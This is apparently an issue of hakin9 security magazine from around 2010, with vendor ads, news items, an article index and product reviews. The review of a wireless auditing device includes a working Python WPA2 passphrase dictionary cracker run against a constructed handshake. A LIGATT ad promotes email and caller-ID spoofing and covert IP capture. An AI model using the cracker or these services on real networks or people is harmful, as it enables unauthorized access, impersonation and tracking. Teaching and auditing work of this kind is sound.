SAINT's crisp new interface makes it even easier to use.

✓ Integrated vulnerability scanning and penetration testing
✓ Payment Card Industry (PCI) Approved Scanning Vendor (ASV)
✓ Heterogeneous exploit and vulnerability coverage
✓ Security tools module includes e-mail harvesting, social engineering trojan, e-mail forgery, and more

Download a free white paper about integrated vulnerability assessment and penetration testing at www.saintcorporation.com/Hakin9

Contact SAINT's sales team at 1-800-596-2006 x0119 or sales@saintcorporation.com

Examine. Expose. Exploit.

Copyright ©2009 SAINT Corporation. All Rights Reserved.



Secure 2010 



Some people say 2010 will be the year of security. After the world's economic crisis, and with the new possibilities that cloud computing and virtualization bring, the computers and data of companies and enterprises are put at risk.

It does not only concern business - it affects individual users as well. Recent attacks on Twitter and other portals have shown us that nothing is safe, even sites that do not hold any secret data or sensitive information. Why are they attacked? To expose the security gaps? To give proof of the attackers' power and unlimited possibilities? Either way, these things are happening.

Recent attacks have shown that the security field needs to evolve much faster than all other branches of technology. We at hakin9 magazine are striving to give you the most recent information and solutions that can keep your private computer and data safe.

In this issue we focus on exploits and exploitation methods that you may come across: mobile exploits and NULL pointer dereferences. You will find articles on movement on the mobile exploit front, privacy keeping and exploitation methods on the mobile web, methods of secrecy, manipulating the network with PacketFu and much more.

As usual, Julian Evans, our IT security expert, discusses malware trends expected in 2010 and Matthew Jonkman provides a great emerging threats section!

In addition you can read book and tool reviews - this time even more than usual.

Enjoy!
hakin9 team
Scanning / Enumerating - Where the hacker checks for weaknesses (open ports) on your network.

Penetrating - Where you will exploit one of the open ports found on your computer or firewall.

Advancing - Gaining more access. For instance, the attacker can break into more sensitive administrator root accounts, install backdoors or Trojan horse programs, and install network sniffers to gather additional information,

... showing his malicious behavior.






PORTSNITCH

PORTSNITCH takes care of the first two stages of computer hacking, with a few quick mouse clicks. PORTSNITCH not only looks for vulnerabilities on your computer or network, it will perform a public information search for the "Target." The public search includes, but is not limited to:

Facebook.com, MySpace.com, Youtube.com
Amazon.com, Google.com, Yahoo.com
News Searches, Blog IP Searches
Email Name Searches, Criminal Searches, Pictures Searches

IPSNITCH

IPSNITCH consists of two powerful programs in one. The first powerful program is email spoofing. This allows you to send an email to anyone you'd like and make it appear to have come from someone else.

The second powerful program allows you to get anyone's IP address. With IPSNITCH all you need is ... IPSNITCH lets you send that person an email making the email look like it came from someone else. When a person opens this email, it will automatically text your cell phone and/or email you the person's personal IP address and the ISP that owns the IP address.

SPOOFNET allows you to surf the internet totally anonymously by hiding your IP address and displaying an IP address that can't be traced back to you. SPOOFNET is a sophisticated proxy server. Although there are thousands of free proxy servers on the market today, they can't all be trusted. As an example, some free proxy servers will capture all the websites you visit as well as all the keys that you type. In other words, some proxy servers can be used as spyware.

TgtJeTsll will notify you by email or text message when an IP address is online or offline. This includes: whether the IP address is online or offline, the ISP, and it will get a fingerprint of the computer to help identify the suspect's computer.



RECON is the most advanced network security auditing program on the market today. RECON is an active scanner, featuring high-speed discovery, configuration auditing, asset profiling, sensitive data discovery and vulnerability analysis of your security posture. RECON performs network scans using vulnerability check databases based on over 15,000 vulnerabilities. Security audits can take hours to perform. With RECON you can start the audit and move on to other projects or personal time. When the audit is complete it will text you or email you to let you know that the audit is complete.

Hands down and thumbs up, PC-211 is the most advanced penetration testing program on the market. Like other LIGATT Security Suites products, you don't need to know anything about penetration testing. PC-211 uses different techniques to bypass firewall, IDS and IPS systems. Just like with RECON, when the penetration test is complete it will text you or email you to let you know that the audit is complete.

Allows you to call any number in the United States or Canada (other countries coming soon) and have any number show up in the person's caller ID. You can change your voice to male or female, record telephone calls, spoof text messages and spoof emails.
NO SOFTWARE TO DOWNLOAD AND INSTALL
All of the LIGATT Security Suites products and services are web-based. That means no matter what operating system you choose, Windows, Mac, Linux or even your web-based cell phone, you can use any of our services.

Unless indicated by a *, we do not charge you for using any of our services if you do not get any results. As an example, if you use IPSNITCH and we do not get the person's IP address, you do not pay. If you use PC-211 and it is unable to hack in, you do not pay. You only pay AFTER we get you your results.

LIGATT Security is always adding new services and features.

LIGATT Security International
www.LIGATT.com

* - SPOOFEM is a per-minute charge. Spoof text and email messages are free with an account. SPOOFNET is a pay-as-you-go service.
Data Mining as a Tool for Security

JASON ANDRESS

Given the current heightened state of security across the globe today, the ability to sift through data, search for key information and identify the occurrences of particular patterns is highly desirable. This capability, known as data mining, can be used to pinpoint anything from seasonal grocery purchasing habits for individuals to the patterns of international telephone calls that might presage an act of terrorism. Data mining, simply, is a process that allows large volumes of data to be searched for patterns and relationships in or among sets of data.

Movement on the Mobile Exploit Front 

TAM HANNA 

All of the exploits and security issues mentioned in this article are the result of plain carelessness by the responsible programmers. Had they been aware of the most basic elements of security, these would never have happened. Unfortunately, developers working at carriers and device manufacturers still see security as an afterthought. Their thinking goes along the lines of: nobody bothered to perform large-scale attacks on us so far, so why should they do so now?

Assessing Microsoft Office 
Communication Server R1/R2 with OAT 

ABHIJEET HATEKAR 

Continuous education and awareness about the advantages of Penetration Testing and Vulnerability Assessment services has led enterprises to finally allocate yearly budgets for their security audits. However, these security audits are limited to the enterprise data networks only, which leaves voice (the VoIP network) unsecured.
Manipulating The Network with PacketFu

KEITH LEE

PacketFu is currently included as a library inside the Metasploit pentesting framework, which is extremely useful if you are planning to code custom networking-related modules in Metasploit. The best way to use PacketFu is to run it in Ubuntu or to download a copy of BackTrack 4.
Code Listings

As it might be hard for you to use the code listings printed in the magazine, we decided to make your work with Hakin9 much easier. We place the complex code listings from the articles on the Hakin9 website (http://www.hakin9.org/en).



Mobile Web: Privacy Keeping and 
Exploitation Methods 

MAURO GENTILE 

Inevitably, most of the readers will think that the purpose of this article is 
to present arguments regarding vulnerabilities related to the protocols 
for Bluetooth, or even how to intercept telephone calls. In fact, this article 
takes an entirely different approach. The main objective is to highlight the 
opportunity to use our phone as a terminal to connect to the network and 
find possible vulnerabilities of Web applications by putting in place some 
mini attacks wherever we are. 

Intelligence Report: Analysis of a Spear 
Phishing Attack 

ADAM PRIDGEN AND MATTHEW WOLLENWEBER 

A spear phishing attack occurs when an attacker sends targeted emails tailored to a specific user or organization. The execution of the attack can vary by the underlying goals of the attacker. In some cases, the goal may be to gain information from a specific user. In other cases, the objective may be to gain access to target networks. Generally, the attack is conducted by convincing the user to either download and run a malicious attachment or interact with the adversaries.

DEFENSE 

Methods of Secrecy 

TAM HANNA 

Keeping data secret has been important from the very moment knowledge was able to confer a benefit on others. Ancient Roman ruler Julius Caesar used an encryption scheme called a substitution cipher. Encryption ciphers like the one used by Caesar are among the most primitive of the methods which can be used for keeping data safe. This article is the beginning of a series which will introduce you to a variety of topics related to data security.

Exploiting NULL Pointer Dereferences 

MARCIN JERZAK AND TOMASZ NOWAK 

The landscape of kernel exploitation techniques is very wide and continues to evolve. Kernel developers apply more and more protection measures to cover all the attack vectors, while bad guys (and others) are inventing new attacks, new exploitation methods and ways to bypass the existing mechanisms. Almost like an arms race.

Bypassing Hardware Based Data Execution 
Prevention on Windows 2003 Service Pack 2 

DAVID KENNEDY 

A short history on Data Execution Prevention (DEP): it was created in order to prevent execution in areas of memory that aren't marked executable. Before trying this, I highly suggest reading skape and Skywing's article in Uninformed called Bypassing Windows Hardware-Enforced DEP.
BEWARE FIREFOX MAL-EXTENSIONS

Malware writers are taking advantage 
of a Firefox mechanism that allows 
extensions to be loaded invisibly to the 
user, Symantec has warned. According to 
Symantec senior engineer Candid Wuest, 
the company has recently observed an 
increase in malware that drops malicious 
BHOs, Firefox extensions, and even 
Opera user scripts... to maximize their 
impact on a user's machine. 

One avenue that's taken is to drop the 
malicious extension directly into Firefox's 
components directory. This means it will 
be automatically loaded with the browser, 
but will not show up in the Add-ons 
window. Consequently, users are unlikely 
to know that the extension has been 
added, or see a mechanism to remove it. 

Wuest also noted that all of the
interesting information (such as credit 
card numbers or passwords) is usually 
entered through the browser, so it's a 
perfect playing field for attackers. 

While access to the components 
directory will be denied in Firefox 3.6 
(requiring the packaging of add-ons as 
XPI [cross platform installer] files and 
forcing them to appear in the Add-ons 
window), that won't rule out the possibility 
of malicious extensions - it will just 
make it harder to create a stealthy 
mal-extension. Even if an extension 
does install in the conventional way, that 
doesn't mean it isn't malicious. 

A paper co-authored by Wuest 
and Elia Florio of Italy's Data Protection 
Authority describes - among other things 
- a number of malicious extensions that 
carry out activities such as logging and 
forwarding all form submissions that 
include a password field, or forwarding all 
URLs visited. 
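A check that follows from the item above, added here as an example and not Symantec's or Mozilla's code: a component dropped straight into Firefox's components directory never appears in the Add-ons window, so the only place it can be seen is on disk. The script hashes every file under a components directory, compares the result with a previously recorded baseline and reports what was added, removed or modified. The directory contents below are constructed in a temporary folder so it runs anywhere; the file names (browser.xpt, nsLoginManager.js, nsUpdateHelper.js) and the baseline path are hypothetical placeholders, not real Firefox files. On a real install you would point inventory() at the components subdirectory of the Firefox program folder.

```python
import hashlib
import json
import os
import shutil
import tempfile


def inventory(root):
    """Map every regular file under root (relative POSIX-style path) to its SHA-256 hex digest."""
    result = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            digest = hashlib.sha256()
            with open(path, "rb") as fh:
                for chunk in iter(lambda: fh.read(65536), b""):
                    digest.update(chunk)
            result[rel] = digest.hexdigest()
    return result


def save_baseline(inv, path):
    """Persist the inventory as JSON; record it right after a clean install or update."""
    with open(path, "w", encoding="utf-8") as fh:
        json.dump(inv, fh, indent=2, sort_keys=True)


def load_baseline(path):
    with open(path, encoding="utf-8") as fh:
        return json.load(fh)


def diff(baseline, current):
    """Files present now but absent from the baseline are exactly what a dropped component looks like."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(p for p in set(baseline) & set(current) if baseline[p] != current[p]),
    }


def _write(path, data):
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "wb") as fh:
        fh.write(data)


def demo():
    """Constructed scenario: record a clean baseline, then simulate the behaviour described above
    (a component dropped into the directory, plus one existing file tampered with)."""
    root = tempfile.mkdtemp(prefix="ff-components-")
    try:
        comp = os.path.join(root, "components")
        # Constructed "clean install": names and contents are placeholders, not Firefox's real files.
        _write(os.path.join(comp, "browser.xpt"), b"XPT placeholder typelib")
        _write(os.path.join(comp, "nsLoginManager.js"), b"// placeholder login manager component\n")
        baseline_path = os.path.join(root, "components-baseline.json")
        save_baseline(inventory(comp), baseline_path)

        # Stealth install: a new .js component (hypothetical name) that the browser would load silently.
        _write(os.path.join(comp, "nsUpdateHelper.js"), b"// would forward form submissions\n")
        # Tampering with an existing component shows up as 'modified' rather than 'added'.
        with open(os.path.join(comp, "nsLoginManager.js"), "ab") as fh:
            fh.write(b"// appended hook\n")

        return diff(load_baseline(baseline_path), inventory(comp))
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Run the baseline step once per Firefox version; a fresh entry in "added" after that is either an update you recognise or something to pull apart.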



CHINA WARNS OF NEW WORM 
VIRUS 

China's anti-virus authorities on Sunday warned computer users to guard against a new mutation of a worm virus, which could infect various documents on a system.

The virus, Worm_Piloyd.B, could infect documents such as exe, html and asp files and prevent the system from restoring the affected documents, according to the Tianjin-based National Computer Virus Emergency Response Center.

The virus could force the system to download other viruses from designated websites, according to the center.



FIREFOX BLOCKS ROGUE ADD-ON 
APPS 

Mozilla is doing some major work to tweak the Firefox code base (the code that drives the browser) to block rogue add-ons from loading from the browser's application components directory.

Consumers will certainly be pleased to hear this news, as this change will boost browser security. Another upside is that it will block developers and software vendors from silently installing Firefox add-ons without explicit user permission. Browser add-ons also have a dramatic effect on performance, in some cases crashing the browser or, even worse, corrupting it.

TIP: Have more than one browser, e.g. Google Chrome or Internet Explorer, in the event of a browser crash.

The change will be introduced in Firefox 3.6 to block third-party applications from adding their code directly to the components directory, where much of Firefox's own code is stored. For more information we suggest you visit Mozilla's security blog.



MICROSOFT CONFIRM WINDOWS 
7 EXPLOIT 

Microsoft has issued a security advisory which acknowledges that Windows 7 and Windows Server 2008 R2 can be exploited by a denial-of-service attack.

Microsoft has swiftly released Security Advisory 977544 with pre-patch mitigations and a confirmation that the published code could provide a roadmap for hackers to cause Windows 7 and Windows Server 2008 R2 systems to stop responding until manually restarted.

As there is no patch, Microsoft recommends that affected users block TCP ports 139 and 445 at the firewall. Windows users should also block all SMB communications to and from the Internet to help prevent attacks.



NEW FORM OF BIOS ATTACK
Researchers from Core Security Technologies have uncovered a new form of BIOS attack using a malicious application called a rootkit. The researchers also claim that this type of attack renders anti-virus useless, as it works against all common BIOS types apart from the newer Extensible Firmware Interface (EFI) firmware in use today.

The researchers created a script that could be flashed onto any BIOS and would then install the rootkit. If hackers could find a way to install a rootkit in the BIOS, anti-virus software would be unable to detect it.

There are some obvious drawbacks to this attack vector. An attacker will need administrative control; however, this could be achieved by pre-installing another virus which would allow malware to flash a rootkit directly onto the BIOS.

Even if the initial virus was detected and removed, the computer would still be under remote control. A full wipe of the hard drive and complete reinstallation of the operating system would not remove it, the researchers warned.

The research concludes that if this type of attack occurred, the only safe method of removal would be removing the BIOS chip. ID Theft Protect suggests you lock down the BIOS against flash updates by password-protecting the system against this type of unauthorised change.

The attack vector is also usable against virtual systems, the researchers said. The BIOS in VMware is embedded as a module in the main VMware executable, and thus could be altered.



RANSOMWARE TROJAN SEARCH EXPLOIT

A new strain of Trojan called Ramvicrype encrypts recently-opened files on compromised Windows PCs. It is a little unusual in that this malware encourages infected users to search the Web for a possible solution.

Initially this Trojan demanded a ransom (you pay some dollars and the virus is removed - in fact the virus is never removed) for a decryption key to unlock the folders and files.

The malware writers use poisoned search results to further infect a user's PC.

At ID Theft Protect, we have identified a number of users who had been infected with the Vicrypt Trojan. A recent example is where the Windows system folder was encrypted with this Trojan. The PC wouldn't boot up as critical Windows system files could not be accessed, so we had no choice but to rebuild the PC. This was actually a first for us!

Unfortunately the only method we found for successfully removing this Trojan was from Symantec: http://www.symantec.com/business/security_response/writeup.jsp?docid=2009-102921-3210-99. Note: this will not work if your Windows system has been infected.

You will have your encrypted folders/files back in under 5 minutes, so you can carry on safely surfing the Web. Note: Vicrypt is in no way connected to a genuine company called www.exquisysltd.com which appears to have inadvertently been linked to this Trojan.



RUSSIA IS MOST FRAUDULENT 
COUNTRY 

Russia has the world's most fraudulent economy and attempts to stamp out white-collar crime have done little to stop its spread during the global financial downturn, PricewaterhouseCoopers (PwC) said in a survey.

Seventy-one per cent of Russian respondents to PwC's global economic crime survey said they had been subject to economic crime in the past year, more than in next-ranked South Africa, Kenya, Canada and Mexico.

Russian fraud was 12 percentage points above its previous showing in 2007, PwC said, and was well above the global average of 30 per cent, the Central and Eastern European average of 34 per cent and the BRIC countries' 34 per cent.

Japan, Hong Kong, Turkey and the Netherlands featured as the territories which reported the lowest levels of fraud, with 9.6 per cent, 13 per cent, 15 per cent and 15 per cent respectively.

PwC said more than 3,000 respondents from 54 countries participated in its survey.

Source: ID Theft Protect



ADOBE TO BE THE TOP TARGET IN 
2010 

Security has changed. The perimeter is no longer a perimeter, and wherever a perimeter still exists it is better protected by firewalls and IDS that, after years and years of preaching, are at last deployed in large companies. With this in mind, hackers have changed target. People trade their privacy for fifteen minutes of fame on Facebook: the hackers attack third-party applications.

People use Twitter to communicate: hackers hijack Twitter accounts and spread malware.

Now that even Microsoft Office documents are less prone to infection, Adobe Reader and Adobe Flash have become the first target for hackers.

Flash and PDF files are everywhere: on PCs as well as on smartphones, tablets and even ebook readers. According to McAfee's 2010 Threat Predictions report, Adobe's products will be the most hit in 2010.

Even Adobe CTO Kevin Lynch admitted that the company's products are more and more under attack.

Proof that the forecasts are correct is the successful attack on a comic strip syndication service delivering strips in Flash format. Hackers broke into the servers delivering the Flash, embedding malicious code that exploited a 0-day in Adobe Flash.



HOWARD SCHMIDT THE NEW 
OBAMA'S CYBER-SECURITY CZAR 

Obama has named Howard Schmidt the new cyber-security czar.

Schmidt, former CSO at Microsoft and eBay and also a Bush adviser, has at least 40 years of experience in the field and is probably one of the most respected authorities in the industry.

Obama, who a few days after his election affirmed that securing computer networks would be a national security priority, left the position vacant for months after Melissa Hathaway resigned in August 2009.

Mr. Schmidt's name was picked from a pool of candidates. Many of them refused, according to the Washington Post, because of the little real authority compared to the responsibility of the position.

Schmidt himself left a similar position in 2003, frustrated, according to colleagues.



TWITTER DEFACED BY IRANIAN 
CYBER ARMY 

Twitter's founding story is not exactly the two-guys-in-a-garage stereotype.

Its founders are experienced tech entrepreneurs who, surprisingly enough, did not give security the right importance at design time.

A number of security flaws found by teenagers in the past few months led to account hijacking and phishing attacks.

Nothing new for a social network, until the Iranian Cyber Army group left the home page of the social network with a black background, an Islamic flag and a clear message: This site has been hacked.

Following the incident, twitter.com and other subdomains were down and tweets were delayed or blocked.

The attack, as described by Twitter's official blog, hit the DNS servers in the most simple way: an easy-to-crack password gave access to the DNS panel, from where the hackers were able to redirect the domain to another server.

Most twitterers, though, did not notice anything suspicious at first: most Twitter clients use direct IPs to connect to the servers, instead of domain names.

A defacement, in the hackers' community, is a demonstration. Next time the attack could be much more dangerous, for Twitter as a company and for the millions of fans of the social network.

Armando Romeo 
EHACK LAB - LMS ACCESS TUTORIAL

This short tutorial will guide you through creating a new account on the eHack LMS (Learning Management System), show you how to enroll in your courses, and download the prep material.

1. Watch the LMS instruction video on www.tinyurl.com/ehacklablms

2. Using your web browser, navigate to http://www.ehacklab.com/lms

This is the homepage where you can see all the courses we offer our sponsors, the website calendar, as well as news and blog updates.




As it states in the top right of the page next to the language choice, you are currently "not logged in."




Proceed to the login page by clicking the (Login) link 
This will take you to a new page where you may either login to 
an existing account or create a new account. In this tutorial, we 
will be creating a new account to later be enrolled in courses. 




This page will look like this:

[screenshot: the "Is this your first time here?" new-account page, with fields for username, password, email address, first name, surname, city/town and country, and a "Create my new account" button]

You are now prompted with a screen asking for some basic account information from which the new account will be created.



[screenshot: the "You need to confirm your login" notice, stating that an email with instructions to complete your registration has been sent to your address]

A confirmation link will be sent to the email you specified in your account. You 
must follow this link and confirm your email before you can access the LMS. 



The email looks like this:

[screenshot: the confirmation email containing the link to complete registration]

Follow the link and you will then be logged into the LMS. You must now use your enrollment key to register yourself with the course.

Begin the creation of a new account by clicking the "Create new account" button.

Click on the course in which you are to be enrolled, in this case the CHFI.

[screenshot: the course enrollment page asking for the enrollment key]

Enter the enrollment key that was provided by your instructor, and click the "Enroll me in this course" button. You are now successfully enrolled in your course.



You now have access to the LMS, your course, and all the tools and resources 
you need to begin your course. This tutorial will be followed up with another short 
tutorial covering the connection to remote attack lab. 



IF THE CD CONTENTS CAN'T BE ACCESSED AND THE DISC ISN'T PHYSICALLY DAMAGED, TRY TO RUN IT ON AT LEAST TWO CD DRIVES.
IF YOU HAVE EXPERIENCED ANY PROBLEMS WITH THE CD, E-MAIL: CD@HAKIN9.ORG
URL: www.secpoint.com
Price: 999 Euro



SecPoint Portable 
Penetrator PP3000 



Along with the popularity of wireless networks and the mobile devices capable of connecting to them, the need for supplying a proper security level arises. To satisfy this need, SecPoint has offered a new device, the Portable Penetrator PP3000. Its job is to analyze and verify the security level of any wireless network you choose. The solution has tools for scanning wireless networks in your environment and helps to perform complete audits of scanned networks. It is able to recover the keys of networks protected with WEP, WPA or WPA2. It manages not only to find gaps in security, but also provides all the data needed to fill these gaps. All the information regarding the level of security, its weak points and suggested solutions to particular problems is presented in a report, which supplies valuable information not only for those with technical knowledge but also for those without it.

The Portable Penetrator PP3000 is based on a Dell Inspiron Mini 10v netbook and a wireless adapter equipped with a rather large antenna and a USB port. The small netbook comes with a 10.1" screen, a battery capable of 5-6 hours of work and an Intel Atom platform which provides satisfactory comfort of work and fully unconstrained mobility. The platform tested had Linux installed. The previously mentioned wireless adapter's antenna has a gain of 8 dBi and the adapter itself can be mounted to the back of the screen using a simple but effective suction cup. The adapter is connected to the computer by a supplied USB cable.

The pre-installed software for the 
Portable Penetrator is browser based. The 
user interface was designed to present all 
valuable information in an intelligible way. After 
completing a short setup process in which 
you set your network parameters and register 
your software, you can start the scanning 
process. The device is capable of discovering 
all networks in range - those hidden as well 
as those with a very weak signal. It presents 
detailed information about these networks such 
as the name, type of encryption, signal strength 
and the number of connected users. 



Once you have chosen the network to work with, it is time to verify its security level. Depending on the type of encryption and the number of connected users you can choose from different methods of attack. If you choose a dictionary-based method you can find such exotic languages as Iranian or Vietnamese. The supplied dictionaries are a very strong part of the solution. The progress of cracking the security key of a chosen network can be easily monitored. The data consists of such parameters as the speed of key generation, the key currently being tested and the number of keys already tested. The speed of key generation depends heavily on the platform used.

With our tested sample, a dual-core Atom at 1.6 GHz, it was 250 keys per second for a WPA-encrypted network. If the password is discovered it is presented to the user. The generated keys use alphanumeric characters, so keys with different combinations of letters and numbers can also be discovered. The methods used for wireless network cracking are based on those used by regular hackers, utilizing such techniques as denial of service, for example. Security professionals will certainly appreciate the ability to choose different types of attacks as well as a huge database of exploits and factory-shipped dictionaries. For those who have less experience the producer has supplied detailed guides on how to use the product. When connected to the Internet the Portable Penetrator can stay up to date by updating its firmware and signature databases.
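The dictionary attack the review describes, written out as an added example (not SecPoint's code) so the 250 keys per second figure makes sense: every candidate passphrase costs 4096 rounds of PBKDF2-HMAC-SHA1 to derive the pairwise master key, a PRF-512 expansion to the pairwise transient key, and one HMAC to check against the MIC of a captured 4-way-handshake frame; the PBKDF2 step dominates and is what pins a netbook to a few hundred guesses per second. The SSID, MAC addresses, nonces, wordlist and passphrase are constructed here and the handshake message is built in-script from the known passphrase so the example runs offline; a real attack takes those values from a sniffed EAPOL-Key frame. The MIC check implements the WPA2/CCMP (key descriptor version 2, HMAC-SHA1) case only; WPA/TKIP uses HMAC-MD5 and is not handled.

```python
import hashlib
import hmac
import time

# Constructed lab values (not from the review): network name, AP and client MACs, nonces.
SSID = b"hakin9-lab"
AA = bytes.fromhex("001122334455")           # authenticator (AP) MAC
SPA = bytes.fromhex("66778899aabb")          # supplicant (client) MAC
ANONCE = hashlib.sha256(b"anonce").digest()  # 32-byte nonces, fixed for reproducibility
SNONCE = hashlib.sha256(b"snonce").digest()
MIC_OFFSET = 81  # 4-byte 802.1X header + 77 bytes of EAPOL-Key fields before the 16-byte MIC


def pmk_from_passphrase(passphrase: bytes, ssid: bytes) -> bytes:
    """802.11i PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes).
    The 4096 iterations are what limits a netbook to a few hundred keys per second."""
    return hashlib.pbkdf2_hmac("sha1", passphrase, ssid, 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-512: concatenate HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ..."""
    out = b""
    i = 0
    while len(out) < 64:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:64]


def ptk_from_pmk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min(AA,SPA) || max(AA,SPA) || min(nonces) || max(nonces))."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """WPA2/CCMP (key descriptor version 2): MIC = HMAC-SHA1(KCK, frame with MIC field zeroed)[:16]."""
    zeroed = eapol_frame[:MIC_OFFSET] + b"\x00" * 16 + eapol_frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def crack(handshake: dict, wordlist):
    """Try each candidate; the first whose derived KCK reproduces the captured MIC is the passphrase."""
    for word in wordlist:
        pmk = pmk_from_passphrase(word, handshake["ssid"])
        ptk = ptk_from_pmk(pmk, handshake["aa"], handshake["spa"], handshake["anonce"], handshake["snonce"])
        if hmac.compare_digest(eapol_mic(ptk[:16], handshake["eapol"]), handshake["mic"]):
            return word
    return None


def build_handshake(passphrase: bytes) -> dict:
    """Construct message 2 of the 4-way handshake (client -> AP) the way a capture would contain it."""
    body = bytes([2])                            # descriptor type: RSN (WPA2)
    body += (0x010A).to_bytes(2, "big")          # key info: version 2, pairwise, MIC present
    body += (16).to_bytes(2, "big")              # key length
    body += (1).to_bytes(8, "big")               # replay counter
    body += SNONCE + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8  # key nonce, IV, RSC, ID
    body += b"\x00" * 16                         # MIC placeholder (filled in below)
    body += (0).to_bytes(2, "big")               # key data length
    frame = bytes([1, 3]) + len(body).to_bytes(2, "big") + body  # 802.1X: version 1, type 3 (EAPOL-Key)
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, SSID), AA, SPA, ANONCE, SNONCE)[:16]
    mic = eapol_mic(kck, frame)
    frame = frame[:MIC_OFFSET] + mic + frame[MIC_OFFSET + 16:]
    return {"ssid": SSID, "aa": AA, "spa": SPA, "anonce": ANONCE, "snonce": SNONCE, "eapol": frame, "mic": mic}


# Constructed capture and wordlist: the real passphrase is in the list, so the attack succeeds.
SAMPLE_HANDSHAKE = build_handshake(b"hakin9-secret")
WORDLIST = [b"password", b"12345678", b"letmein1", b"hakin9-secret", b"qwertyui"]

if __name__ == "__main__":
    start = time.perf_counter()
    found = crack(SAMPLE_HANDSHAKE, WORDLIST)
    tried = WORDLIST.index(found) + 1 if found else len(WORDLIST)
    rate = tried / (time.perf_counter() - start)
    print(f"recovered passphrase: {found!r} after {tried} guesses, about {rate:.0f} keys/s")
```

Because PBKDF2 is salted with the SSID, a precomputed table only helps against networks that share a name; against an uncommon SSID the cost per guess is paid in full, which is exactly the time the review's progress display is counting.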

Whether you're a security professional or a novice, the Portable Penetrator PP3000 is a device which is a complete solution for auditing and improving the security level of wireless networks. Thanks to the built-in report module you will have all the documentation of the security audits you have conducted. The product costs 999 EUR, a great value for a complete solution like the Portable Penetrator PP3000.
NETIKUS.NET ltd

NETIKUS.NET ltd offers freeware tools and EventSentry, a comprehensive monitoring solution built around the Windows event log and log files. The latest version of EventSentry also monitors various aspects of system health, for example performance monitoring. EventSentry has received numerous awards and is competitively priced.

http://www.netikus.net
http://www.eventsentry.com



Heorot.net

Heorot.net provides training for penetration testers of all skill levels. Developer of the De-ICE.net PenTest LiveCDs, we have been in the information security industry since 1990. We offer free, online, on-site, and regional training courses that can help you improve your managerial and PenTest skills.

www.Heorot.net

e-mail: contact@heorot.net



ElcomSoft Co. Ltd 

ElcomSoft is a Russian software developer specializing in system security and password recovery software. Our programs allow you to recover passwords to 100+ applications incl. MS Office 2007 apps, PDF files, PGP, Oracle and UNIX passwords. ElcomSoft tools are used by most of the Fortune 500 corporations, military, governments, and all major accounting firms. 

www.elcomsoft.com 
e-mail: info@elcomsoft.com 






VINTEGRIS S.L 

VINTEGRIS S.L is a company dedicated to IT security in Spain. We focus on development of authentication, web access control, password management and synchronization, and digital signature systems, to integrate into the IT of our customers. We also perform integration of third-party recognized security products. Most of our consultants are CISA and CISSP certified and our company is ISO/27001 certified. 

http://www.vintegris.com 
e-mail: info@vintegris.com 



Netsecuris Inc. 

Who's watching your network? 

Netsecuris is a professional provider of managed information security and consulting services that focuses on ensuring the security of your networks and systems. Services include managed firewall/intrusion prevention, managed email security, network penetration testing, vulnerability assessments, and information systems risk assessments. 

http://www.netsecuris.com 
email: sales@netsecuris.com 



Priveon 

Priveon offers complete security lifecycle services - Consulting, Implementation, Support, Audit and Training. Through extensive field experience of our expert staff we maintain a positive reinforcement loop between practices to provide our customers with the latest information and services. 

http://www.priveon.com 
http://blog.priveonlabs.com/ 



JOIN OUR EXCLUSIVE CLUB AND GET: 

■ Hakin9 one year subscription 
■ classified ad for duration of your subscription 
■ discount on advertising 

You wish to have an ad here? 
Join our EXCLUSIVE&PRO CLUB! 
For more info e-mail us at en@hakin9.org or go to www.hakin9.org/en 
Url: http://www.avanquest.com 
Cost: $29.00 



Double Anti-Spy 



When I received the link for Double Anti-Spy I did a little check around on the Internet, as this was a product I hadn't heard of before. According to the website, this product utilises exclusive "double scan" technology, which is an interesting concept as I usually run 2 different anti-spyware applications on my machine, 1 in a live state and the other as a backup scan. 

I decided to install this software onto a freshly installed Windows XP SP3 Dell Latitude Pentium III machine (I know it's old, but it still works well!). 

Installing the software went smoothly enough, and then I had a choice of 3 scans to make on my machine: a quick scan that will only scan the important locations, a full scan to scan all the hard drives on the machine, and a custom scan that allows the user to specify what they would like scanned. A full system scan is recommended after installation and updating the definitions, to find all traces of spyware that might be located on the computer system. Upon reboot I did an initial full scan of the machine; I didn't expect it to find anything as I had only downloaded service pack updates, but it did identify two potentially suspicious cookies. 

Now it was time to test it properly against some spyware, using a website called Spycar (http://www.spycar.org/Spycar.html), which was designed with exactly this in mind and offers 17 different tests that all anti-spyware should really pick up and protect you against. 

Auto Start Tests 

The following tests were performed on Internet Explorer 8; the website tries to install a registry key at various locations on your machine and execute it. For example: 

■ HKLM\Software\Microsoft\Windows\ 
CurrentVersion\Run 

■ HKCU\Software\Microsoft\Windows\ 
CurrentVersion\Run 

Internet Explorer Configuration Change Tests 

Again using Internet Explorer 8, these tests see if it is possible to change the current configuration of your web browser. For example: 

■ Try to change your default home page 
■ Try to lock out users from changing the default home page in IE 



Network Configuration Change Test 

The following tests were performed on Internet Explorer 8 to see if it is possible to make changes to your hosts file. 

When trying to add an entry to your hosts file, every one of these tests was captured and blocked by Double Anti-Spy; they were immediately quarantined as soon as they were executed on the web page. Double Anti-Spy doesn't just protect you whilst you are out on the Internet, it also protects your email client as well: whether you are using Microsoft Outlook, Windows Mail or Mozilla Thunderbird, Double Anti-Spy will integrate with it. 

